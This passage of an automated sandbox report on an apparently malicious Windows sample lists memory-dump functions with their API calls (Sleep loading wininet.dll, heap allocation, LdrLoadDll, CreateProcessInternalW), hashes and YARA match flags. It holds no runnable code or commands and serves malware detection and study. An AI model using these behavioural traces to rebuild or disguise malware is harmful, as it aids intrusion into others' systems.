                                                                                                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0201FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D6EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000D6F98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: 29097cdb59da505528e7f161a35d1caf44ca429492a1ebe8889a1c92866cae15
                                                                                                                                                    • Instruction ID: 9d3d7eed900556715bb755731d869f78f49ac6a739abc8f0f268f4cf4bbc5c30
                                                                                                                                                    • Opcode Fuzzy Hash: 29097cdb59da505528e7f161a35d1caf44ca429492a1ebe8889a1c92866cae15
                                                                                                                                                    • Instruction Fuzzy Hash: 7B316FB5601704ABC725DF68D8A1FABB7F8BB48700F00852EF61A5B282D730B545CBB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D6EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 86sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000D6F98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: 44821f4972675571c7a21eeed0b97564c654f2a365fde359ae5023c0563713b9
                                                                                                                                                    • Instruction ID: ae22fab8c2f7f539e6c7d92c9a8a03950dba355732bdf762dfb781e84313eb47
                                                                                                                                                    • Opcode Fuzzy Hash: 44821f4972675571c7a21eeed0b97564c654f2a365fde359ae5023c0563713b9
                                                                                                                                                    • Instruction Fuzzy Hash: 14318171601704ABC711DF64D8A1FABB7F8AF48700F10802EF6199B382D771A445CBB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D8466, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5,?,000D3C9F,000D3C9F,?,000D3526,?,?,?,?,?,00000000,00000000,?), ref: 000D84CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5
                                                                                                                                                    • API String ID: 1279760036-520183115
                                                                                                                                                    • Opcode ID: f2a8e116336418ce2ed236fc7c7a6acf947b61cb4dd5d7af6acac72b3fd586a1
                                                                                                                                                    • Instruction ID: 4efd97fee1aeb7a9a6f6aaaacccb9d06fce33ebfffac7d2fcc3af8d7777920a5
                                                                                                                                                    • Opcode Fuzzy Hash: f2a8e116336418ce2ed236fc7c7a6acf947b61cb4dd5d7af6acac72b3fd586a1
                                                                                                                                                    • Instruction Fuzzy Hash: 56F082B26002146BD724EF94DC81EE7736DEF84360F10855AF9485B241D531E90587F0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D84A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5,?,000D3C9F,000D3C9F,?,000D3526,?,?,?,?,?,00000000,00000000,?), ref: 000D84CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5
                                                                                                                                                    • API String ID: 1279760036-520183115
                                                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction ID: 43164943ec5fd67592eee5559b15986a72956029c15e91bdf24640ecec4c0904
                                                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction Fuzzy Hash: F0E012B1200308ABDB14EF99CC41EA777ADAF88650F118559BA085B282CA30F9108BB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D84DF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D850D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    • Opcode ID: 247018d951ffee980320a54073db4eba1eae5dbaea64757db734bc8c2a5d59d0
                                                                                                                                                    • Instruction ID: f7a8c685ca9eb2d77e16d6f99d4e79f2567cb53b672efeab9412c91108fd8422
                                                                                                                                                    • Opcode Fuzzy Hash: 247018d951ffee980320a54073db4eba1eae5dbaea64757db734bc8c2a5d59d0
                                                                                                                                                    • Instruction Fuzzy Hash: 36E01AB12003086BD714DF59CC45EA777ADAF88750F018555B90857282C630E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D84E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D850D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction ID: f7a8c685ca9eb2d77e16d6f99d4e79f2567cb53b672efeab9412c91108fd8422
                                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction Fuzzy Hash: 36E01AB12003086BD714DF59CC45EA777ADAF88750F018555B90857282C630E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000C7270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C72CA
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C72EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                                                                                                    • Instruction ID: 33caddf6c71e2bf3aa31b2218c337055f3fb59acd7bc6cf2a3d47c694b6da511
                                                                                                                                                    • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                                                                                                    • Instruction Fuzzy Hash: 0701A231A8032877E720A7949C03FFEB76C5B00B51F150119FF04BA2C2E6946A0686F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000C9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000C9BA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: dda356857a02757c4e0b4cb2cb56338cf52a2a66a58fa16e8b158c1ff04daf3f
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: 0E0112B5E0020DB7DB10DBE4DD46FDDB7B89B54308F004195E91897242F671EB14C7A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D854D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D85A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    • Opcode ID: e92229fa3cb9e0e8aa833ca014e079b3405fb1d5c2a1285ca3384ed237c8556a
                                                                                                                                                    • Instruction ID: 97045ca2108e4336870cf6926c57c84d02a20aaf5a49936249c198960161e8fb
                                                                                                                                                    • Opcode Fuzzy Hash: e92229fa3cb9e0e8aa833ca014e079b3405fb1d5c2a1285ca3384ed237c8556a
                                                                                                                                                    • Instruction Fuzzy Hash: 130114B2204109AFCB04CF88DC81DEB37ADAF8C310F158649FE5D97242C630E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000D8550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D85A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction ID: b66f275f541601b82473108a90fc70bb8f9d53c32599e0fc91575dc0819cc9c5
                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
